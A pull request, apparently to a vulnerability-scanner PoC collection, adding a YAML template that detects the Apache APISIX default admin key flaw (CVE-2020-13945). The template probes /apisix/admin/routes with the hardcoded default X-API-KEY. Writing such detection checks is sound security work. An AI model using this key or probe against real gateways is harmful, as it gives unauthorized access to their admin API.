### PR TITLE
Apache APISIX 默认密钥漏洞（CVE-2020-13945）

### DIFF
--- a/pocs/apache-apisix-default-token.yml
+++ b/pocs/apache-apisix-default-token.yml
@@ -1,0 +1,18 @@
+name: poc-yaml-apache-apisix-default-token
+manual: true
+transport: http
+rules:
+  r0:
+    request:
+      cache: true
+      method: POST
+      path: /apisix/admin/routes
+      headers:
+        X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
+      follow_redirects: true
+    expression: response.status == 400 && response.body.bcontains(b"missing configurations")
+expression: r0()
+detail:
+  author: fox09(https://github.com/fox1111101001)
+  links:
+    - https://github.com/vulhub/vulhub/blob/master/apisix/CVE-2020-13945/README.zh-cn.md


### PR DESCRIPTION


## 本 poc 是检测什么漏洞的
Apache APISIX 默认密钥漏洞（CVE-2020-13945）

## 测试环境
https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945

## 备注
![微信截图_20220223172803](https://user-images.githubusercontent.com/74575964/155292474-2310b53f-6ea4-4a84-969a-83b5a581a70e.png)

